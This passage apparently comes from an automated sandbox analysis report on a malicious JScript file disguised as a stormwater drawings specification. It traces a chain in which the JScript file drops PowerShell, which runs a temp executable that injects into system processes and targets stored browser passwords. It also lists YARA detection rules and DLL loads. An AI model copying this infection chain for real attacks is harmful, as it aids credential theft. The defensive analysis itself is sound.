                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462A3529_2_0462A352
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462132D9_2_0462132D
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_046303E69_2_046303E6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0457E3F09_2_0457E3F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045B739A9_2_045B739A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04570C009_2_04570C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045E9C329_2_045E9C32
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462FCF29_2_0462FCF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04560CF29_2_04560CF2
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04610CB59_2_04610CB5
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04627D739_2_04627D73
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04573D409_2_04573D40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04621D5A9_2_04621D5A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0457AD009_2_0457AD00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0458FDC09_2_0458FDC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0456ADE09_2_0456ADE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04588DBF9_2_04588DBF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04570E599_2_04570E59
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462EE269_2_0462EE26
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462EEDB9_2_0462EEDB
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04582E909_2_04582E90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04579EB09_2_04579EB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462CE939_2_0462CE93
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045E4F409_2_045E4F40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04590F309_2_04590F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462FF099_2_0462FF09
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04562FC89_2_04562FC8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04571F929_2_04571F92
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462FFB19_2_0462FFB1
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045728409_2_04572840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0457A8409_2_0457A840
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0459E8F09_2_0459E8F0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045738E09_2_045738E0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045568B89_2_045568B8
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045799509_2_04579950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0458B9509_2_0458B950
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045869629_2_04586962
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0463A9A69_2_0463A9A6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045729A09_2_045729A0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04627A469_2_04627A46
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462FA499_2_0462FA49
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045E3A6C9_2_045E3A6C
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0461DAC69_2_0461DAC6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0460DAAC9_2_0460DAAC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0456EA809_2_0456EA80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_045B5AA09_2_045B5AA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462FB769_2_0462FB76
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0462AB409_2_0462AB40
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_04626BD79_2_04626BD7
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0458FB809_2_0458FB80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_02611FD09_2_02611FD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260B0609_2_0260B060
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260D0709_2_0260D070
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260B1F99_2_0260B1F9
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260B1A49_2_0260B1A4
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260B1B09_2_0260B1B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_026156709_2_02615670
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0261387B9_2_0261387B
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_026138809_2_02613880
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260CE479_2_0260CE47
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0260CE509_2_0260CE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0262BE509_2_0262BE50
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0441E4679_2_0441E467
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0441E7FC9_2_0441E7FC
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0441D8C89_2_0441D8C8
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_029882F710_2_029882F7
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_0298339710_2_02983397
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_0298138710_2_02981387
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_02989BA210_2_02989BA2
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_02989BA710_2_02989BA7
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_0298B99710_2_0298B997
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_029A217710_2_029A2177
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_0298317710_2_02983177
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_0298316E10_2_0298316E
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_029814D710_2_029814D7
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_029814CB10_2_029814CB
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeCode function: 10_2_0298152010_2_02981520
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00F65130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00F77E54 appears 85 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00F1B970 appears 248 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00F9EA12 appears 84 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00FAF290 appears 103 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 045B7E54 appears 85 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 045EF290 appears 103 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0455B970 appears 248 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 045A5130 appears 36 times
                Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 045DEA12 appears 84 times
                Source: Stormwater Works Drawings Spec.jsInitial sample: Strings found which are bigger than 50
                Source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr, cb60b9da33aec3a3b9ec2472d80be41ee.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr, c405801f372761b2d9b950fa86a46e4a3.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.powershell.exe.1cfdb03c4a0.0.raw.unpack, cb60b9da33aec3a3b9ec2472d80be41ee.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: 1.2.powershell.exe.1cfdb03c4a0.0.raw.unpack, c405801f372761b2d9b950fa86a46e4a3.csCryptographic APIs: 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@12/8@6/6
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\et18ob[1].ps1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03
                Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\downloaded_script.ps1Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: runonce.exe, 00000009.00000003.2393763491.0000000002758000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2974317535.0000000002758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Stormwater Works Drawings Spec.jsVirustotal: Detection: 13%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeSection loaded: dnsapi.dllJump to behavior
